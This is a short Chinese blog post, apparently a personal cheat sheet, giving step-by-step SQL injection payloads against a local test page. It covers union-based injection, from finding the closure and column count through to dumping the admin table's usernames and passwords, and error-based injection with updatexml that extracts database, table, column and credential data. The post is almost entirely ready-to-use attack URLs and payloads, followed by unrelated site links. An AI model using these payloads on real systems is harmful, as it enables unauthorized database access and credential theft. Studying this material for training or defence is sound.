sql注入流程
sql注入流程
联合查询:
查闭合id=1’ and 1=1
id=1’ and 1=2
查列数
http://127.0.0.1/shouke.php?id=1") order by 4 #
显示位
http://127.0.0.1/shouke.php?id=1") and 1=2 union select 1,2,3,4 #
查数据库名
http://127.0.0.1/shouke.php?id=1") and 1=2 union select 1,database(),3,4 #
查表名
http://127.0.0.1/shouke.php?id=1") and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘test’ #
查字段
http://127.0.0.1/shouke.php?id=1") and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=‘test’ and table_name = ‘admin’ #
http://127.0.0.1/shouke.php?id=1") and1=2 union select 1,group_concat(username,0x23,password),3,4 from test.admin #
报错注入:
得到库名?id=1’ and updatexml(1,concat(0x23,database(),0x23),1) %23
得到表名?id=1’ and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x23),1) %23
得到列名?id=1’ and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name =‘users’),0x23),1) %23
得到账号?id=1’ and updatexml(1,concat(0x23,(select concat(username,0x23,password) from security.users limit 7,1),0x23),1) %23
- 点赞 2
- 收藏
- 分享
- 文章举报
qq_40753178
发布了1 篇原创文章 · 获赞 2 · 访问量 103
私信
关注
- iOS开发 开发者证书申请及上架流程
- 软件设计的一般流程
- JVM从加载到结束流程
- k8s源码分析--kubelet中pod处理流程(续)
- Kafka 0.10 KafkaConsumer流程简述
- 了解项目流程
- Android平台WIFI启动流程之一
- Grunt搭建自动化web前端开发环境--完整流程
- SQL注入天书之ASP注入漏洞全接触
- 传智播客 struts1.x 工作原理与流程
- Android设备运行流程
- android 启动流程
- 嵌入式学习-嵌入式的组成特点,开发流程等
- Apple iOS MDM开发流程
- 基于SQL注入的手工测试Cookie
- IMX6Solo启动流程-Linux 内核启动 五
- 移动开发流程模式下的软件工程新实践
- Android View的绘制流程
- SVN服务器搭建及客户端使用的基本流程
- Android6.0 systemui锁屏流程解析